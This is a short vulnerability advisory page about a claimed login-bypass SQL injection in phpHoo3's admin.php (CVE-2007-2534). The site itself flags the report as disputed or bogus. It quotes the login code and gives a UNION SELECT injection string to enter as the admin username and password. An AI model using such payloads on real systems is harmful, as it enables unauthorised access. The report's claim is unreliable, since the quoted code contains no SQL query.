WARNING! Fake news / Disputed / BOGUS

phpHoo3 (admin.php) Remote Login Bypass SQL Injection Vulnerability

2007.05.12
Credit: ilkerkandemir
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2007-2534
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# phpHoo3 Login SQL injection // AYYILDIZ.ORG Gururla Sunar... # download:http://cable-modems.org/phpHoo/files/phphoo3.zip # author : iLker Kandemir < ilkerkandemir <at> mynet.com > # Risk : High # Class : Remote # Vuln. Script : phpHoo3 # tnx : h0tturk,ekin0x,Gencnesil,Gencturk,koray,Ajann .. Vulnerable; ///admin.php code ; if($HooPass == $ADMIN_COOKIE) { //If the cookie exists // should we delete the cookie and start? if (isset($exit_admin)) { setcookie("HooPass", ""); header ("Location: $SITE_URL$SITE_DIR"); exit; } } // Check to see if we are being posted a set of USER/PASS if (isset($LOGIN) && !empty($HTTP_POST_VARS)) { $vars = $HTTP_POST_VARS; if (($vars["USER"] == $ADMIN_USER) && ($vars["PASS"] == $ADMIN_PASS)) { setcookie("HooPass", $ADMIN_COOKIE); header ("Location: $SITE_URL$SITE_DIR"); exit; } //The cookie exists ... ADMIN_USER : 1/**/union/**/select/**/0,1,2,3,4/* ADMIN_PASS : 1/**/union/**/select/**/0,1,2,3,4/* ///admin.php logged...


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top